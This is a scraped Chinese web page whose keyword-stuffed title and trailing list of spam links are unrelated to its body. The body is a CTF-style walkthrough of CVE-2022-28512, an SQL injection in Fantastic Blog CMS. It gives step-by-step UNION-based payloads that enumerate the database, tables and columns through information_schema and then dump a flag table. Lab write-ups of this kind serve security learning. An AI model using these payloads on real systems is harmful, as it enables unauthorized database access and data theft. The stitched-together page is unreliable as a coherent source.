当前位置: 首页 > news >正文

女程序员可以干到多少岁网站营销优化

女程序员可以干到多少岁,网站营销优化,百度快速收录账号购买,优设网 国内专业设计师平台文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。… 文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、CVE-2022-28512靶场简述 Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id5”参数在“/fantasticblog/single.php”中注入查询。 二、找注入点 Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下id参数存在一个SQL注入漏洞。 我们就尝试找single.php的界面。 打开发现是有一个登录框和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示) 点开图片发现跳转到single.php界面成功找到注入地方(如图所示) 三、CVE-2022-28512漏洞复现 1、判断注入点2、爆显位个数3、爆显位位置4、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 1、判断注入点 (如图所示)这里我们老规矩抛出and 11 和 and 12测试。发现页面依旧正常排除数字型。直接提交3’发现报错报错信息为 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘3’’’ at line 1 通过报错信息可以知道是单引号闭合这里构造的payload为 id3--2、爆显位个数 注入语句为 id3 order by 9--发现为10的时候报错那么显位个数是9了。 3、爆显位位置 注入语句为 id-3 union select 1,2,3,4,5,6,7,8,9--发现有4可以注入我就在4注入了 4 、爆数据库名 注入语句为 id-3 union select 1,2,3,database(),5,6,7,8,9--得到数据库ctf 5、爆数据库表名 注入语句为 id-3 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schemadatabase()--得到数据库表名 titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info 关键表名是flag 6、爆数据库列名 注入语句为 id-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schemadatabase() and table_nameflag--得到列名flag 7、爆数据库数据 注入语句为 id-3 union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --得到flag flag{6bf76a30-c821-429b-b2e7-03b6068cdf36} 总结 这一关的信息收集比较简单一下子找到注入点了。这是一个简单的单引号闭合简单注入极其简单。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
http://www.dnsts.com.cn/news/87464.html

相关文章:

  • 单页网站模板修改吗发布 php 微网站
  • 满洲里网站建设整站下载器 做网站地图
  • 沛县网站企业网站备案系统
  • 六盘水市网站建设美食网站开发的目标
  • 湖南智能网站建设平台百度爱采购优化排名软件
  • 高平网站优化公司毕业答辩问题怎么做的这个网站
  • 深圳建设管理中心网站正规网站开发流程
  • 英文外贸网站制作外贸网站 流量
  • 做网站要好多钱WordPress添加ftp
  • 建站模板 discuzwordpress注册未发邮件
  • 山东省建设工程注册中心网站群晖wordpress端口无法登陆
  • 洛阳网站建设启辰网络微舍 微网站 怎么做
  • 免费网站建设咨询手工企业网站模板
  • 电子商务网站建设与管理案例如何将网站开发成微信小程序
  • 长春网长春网站建设络推广旺店通app手机企业版下载
  • 枣庄学习建设网站培训徐州英才网最新招聘信息
  • 深圳龙华区住房和建设局网站京东app下载官网免费下载
  • 网站开发代理报价表网站建设费用的账务处理
  • 做网站要霸屏吗全球云邮登陆网站
  • 用网站模板做网站wordpress站点标题副标题换行
  • 口碑好的网站开发公司营销策略都有哪些
  • 鄂州商城网站建设建设银行网站电脑版
  • 甜品店网站建设scratch网站开发
  • 网站建设常州青之峰备案需要网站空间
  • 网站新版礼嘉网络推广
  • 无锡网站建设唯唯网络seogw
  • 利用表单大师做网站嵌入式开发板哪款好
  • 做丝网网站哪个好代理公司名称
  • 做个人网站怎么做免费看的logo图片
  • 网站前台设计软件免费建网站平台哪个好